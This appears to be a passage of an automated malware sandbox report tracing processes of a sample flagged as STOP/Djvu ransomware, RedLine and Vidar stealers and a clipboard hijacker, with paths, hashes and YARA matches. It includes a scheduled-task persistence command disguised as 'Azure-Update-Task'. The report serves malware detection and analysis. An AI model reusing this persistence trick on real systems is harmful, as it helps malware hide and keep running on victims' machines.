                                                                                                                                      Imagebase:0x460000
                                                                                                                                      File size:29'696 bytes
                                                                                                                                      MD5 hash:2E49585E4E08565F52090B144062F97E
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:5
                                                                                                                                      Start time:14:42:03
                                                                                                                                      Start date:24/04/2024
                                                                                                                                      Path:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\Desktop\qJKiVKZdFk.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:780'288 bytes
                                                                                                                                      MD5 hash:F3AD3E0F90ADFD9A28DBEAB4BC6196EF
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000005.00000002.1244671566.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000005.00000002.1244671566.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.1244558596.0000000004458000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:6
                                                                                                                                      Start time:14:42:03
                                                                                                                                      Start date:24/04/2024
                                                                                                                                      Path:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\Desktop\qJKiVKZdFk.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:780'288 bytes
                                                                                                                                      MD5 hash:F3AD3E0F90ADFD9A28DBEAB4BC6196EF
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:7
                                                                                                                                      Start time:14:42:03
                                                                                                                                      Start date:24/04/2024
                                                                                                                                      Path:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe --Task
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:780'288 bytes
                                                                                                                                      MD5 hash:F3AD3E0F90ADFD9A28DBEAB4BC6196EF
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.1251680142.0000000004488000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000007.00000002.1251772468.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000007.00000002.1251772468.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 45%, ReversingLabs
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:8
                                                                                                                                      Start time:14:42:04
                                                                                                                                      Start date:24/04/2024
                                                                                                                                      Path:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe --Task
                                                                                                                                      Imagebase:0x910000
                                                                                                                                      File size:780'288 bytes
                                                                                                                                      MD5 hash:F3AD3E0F90ADFD9A28DBEAB4BC6196EF
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000008.00000002.3676316923.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000008.00000002.3676316923.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000008.00000002.3676316923.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000008.00000002.3681953148.0000000000656000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:false

                                                                                                                                      General

                                                                                                                                      Target ID:18
                                                                                                                                      Start time:14:42:12
                                                                                                                                      Start date:24/04/2024
                                                                                                                                      Path:C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exe"
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:296'448 bytes
                                                                                                                                      MD5 hash:A04031208441077A014F42095FF86107
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000012.00000002.1332847113.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000012.00000002.1332771724.0000000001AEE000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:19
                                                                                                                                      Start time:14:42:12
                                                                                                                                      Start date:24/04/2024
                                                                                                                                      Path:C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exe"
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:296'448 bytes
                                                                                                                                      MD5 hash:A04031208441077A014F42095FF86107
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000013.00000002.1515252770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:21
                                                                                                                                      Start time:14:42:14
                                                                                                                                      Start date:24/04/2024
                                                                                                                                      Path:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe" --AutoStart
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:780'288 bytes
                                                                                                                                      MD5 hash:F3AD3E0F90ADFD9A28DBEAB4BC6196EF
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000015.00000002.1385315034.0000000005E80000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000015.00000002.1385315034.0000000005E80000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000015.00000002.1384952175.0000000004413000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:22
                                                                                                                                      Start time:14:42:15
                                                                                                                                      Start date:24/04/2024
                                                                                                                                      Path:C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build3.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build3.exe"
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:306'688 bytes
                                                                                                                                      MD5 hash:41B883A061C95E9B9CB17D4CA50DE770
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000016.00000002.1457933535.00000000009AD000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 00000016.00000002.1457447883.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000016.00000002.1457447883.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 00000016.00000002.1457447883.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      Reputation:moderate
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:23
                                                                                                                                      Start time:14:42:15
                                                                                                                                      Start date:24/04/2024
                                                                                                                                      Path:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe" --AutoStart
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:780'288 bytes
                                                                                                                                      MD5 hash:F3AD3E0F90ADFD9A28DBEAB4BC6196EF
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000017.00000002.1390298736.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000017.00000002.1390298736.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000017.00000002.1390298736.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:25
                                                                                                                                      Start time:14:42:23
                                                                                                                                      Start date:24/04/2024
                                                                                                                                      Path:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe" --AutoStart
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:780'288 bytes
                                                                                                                                      MD5 hash:F3AD3E0F90ADFD9A28DBEAB4BC6196EF
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000019.00000002.1459503770.0000000005E00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000019.00000002.1459503770.0000000005E00000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000019.00000002.1457594095.000000000444C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:26
                                                                                                                                      Start time:14:42:24
                                                                                                                                      Start date:24/04/2024
                                                                                                                                      Path:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe" --AutoStart
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:780'288 bytes
                                                                                                                                      MD5 hash:F3AD3E0F90ADFD9A28DBEAB4BC6196EF
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000001A.00000002.1464580349.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000001A.00000002.1464580349.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000001A.00000002.1464580349.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:27
                                                                                                                                      Start time:14:42:24
                                                                                                                                      Start date:24/04/2024
                                                                                                                                      Path:C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build3.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build3.exe"
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:306'688 bytes
                                                                                                                                      MD5 hash:41B883A061C95E9B9CB17D4CA50DE770
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 0000001B.00000002.1459562254.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 0000001B.00000002.1459562254.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 0000001B.00000002.1459562254.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      Reputation:moderate
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:28
                                                                                                                                      Start time:14:42:25
                                                                                                                                      Start date:24/04/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                                                                                      Imagebase:0xdc0000
                                                                                                                                      File size:187'904 bytes
                                                                                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:29
                                                                                                                                      Start time:14:42:25
                                                                                                                                      Start date:24/04/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:30
                                                                                                                                      Start time:15:58:01
                                                                                                                                      Start date:24/04/2024
                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:306'688 bytes
                                                                                                                                      MD5 hash:41B883A061C95E9B9CB17D4CA50DE770
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 0000001E.00000002.1577090127.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 0000001E.00000002.1577090127.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 0000001E.00000002.1577090127.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001E.00000002.1577294491.00000000008CD000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 87%, ReversingLabs
                                                                                                                                      Reputation:moderate
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:31
                                                                                                                                      Start time:15:58:01
                                                                                                                                      Start date:24/04/2024
                                                                                                                                      Path:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe --Task
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:780'288 bytes
                                                                                                                                      MD5 hash:F3AD3E0F90ADFD9A28DBEAB4BC6196EF
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001F.00000002.1490235775.000000000422E000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000001F.00000002.1490507183.0000000005E70000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000001F.00000002.1490507183.0000000005E70000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:32
                                                                                                                                      Start time:15:58:02
                                                                                                                                      Start date:24/04/2024
                                                                                                                                      Path:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe --Task
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:780'288 bytes
                                                                                                                                      MD5 hash:F3AD3E0F90ADFD9A28DBEAB4BC6196EF
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000020.00000002.1505470760.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000020.00000002.1505470760.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000020.00000002.1505470760.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:33
                                                                                                                                      Start time:15:58:12
                                                                                                                                      Start date:24/04/2024
                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:306'688 bytes
                                                                                                                                      MD5 hash:41B883A061C95E9B9CB17D4CA50DE770
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 00000021.00000002.3674124783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000021.00000002.3674124783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 00000021.00000002.3674124783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      Reputation:moderate
                                                                                                                                      Has exited:false

                                                                                                                                      General

                                                                                                                                      Target ID:34
                                                                                                                                      Start time:15:58:12
                                                                                                                                      Start date:24/04/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                                                                                      Imagebase:0xdc0000
                                                                                                                                      File size:187'904 bytes
                                                                                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:35
                                                                                                                                      Start time:15:58:12
                                                                                                                                      Start date:24/04/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:38
                                                                                                                                      Start time:15:58:45
                                                                                                                                      Start date:24/04/2024
                                                                                                                                      Path:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe --Task
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:780'288 bytes
                                                                                                                                      MD5 hash:F3AD3E0F90ADFD9A28DBEAB4BC6196EF
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000026.00000002.1929992675.000000000443A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000026.00000002.1930318065.0000000005E60000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000026.00000002.1930318065.0000000005E60000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:39
                                                                                                                                      Start time:15:58:46
                                                                                                                                      Start date:24/04/2024
                                                                                                                                      Path:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe --Task
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:780'288 bytes
                                                                                                                                      MD5 hash:F3AD3E0F90ADFD9A28DBEAB4BC6196EF
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000027.00000002.1939278808.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000027.00000002.1939278808.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000027.00000002.1939278808.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:40
                                                                                                                                      Start time:15:59:00
                                                                                                                                      Start date:24/04/2024
                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:306'688 bytes
                                                                                                                                      MD5 hash:41B883A061C95E9B9CB17D4CA50DE770
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000028.00000002.2121357448.0000000000971000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 00000028.00000002.2121223702.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000028.00000002.2121223702.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 00000028.00000002.2121223702.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:41
                                                                                                                                      Start time:15:59:06
                                                                                                                                      Start date:24/04/2024
                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:306'688 bytes
                                                                                                                                      MD5 hash:41B883A061C95E9B9CB17D4CA50DE770
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
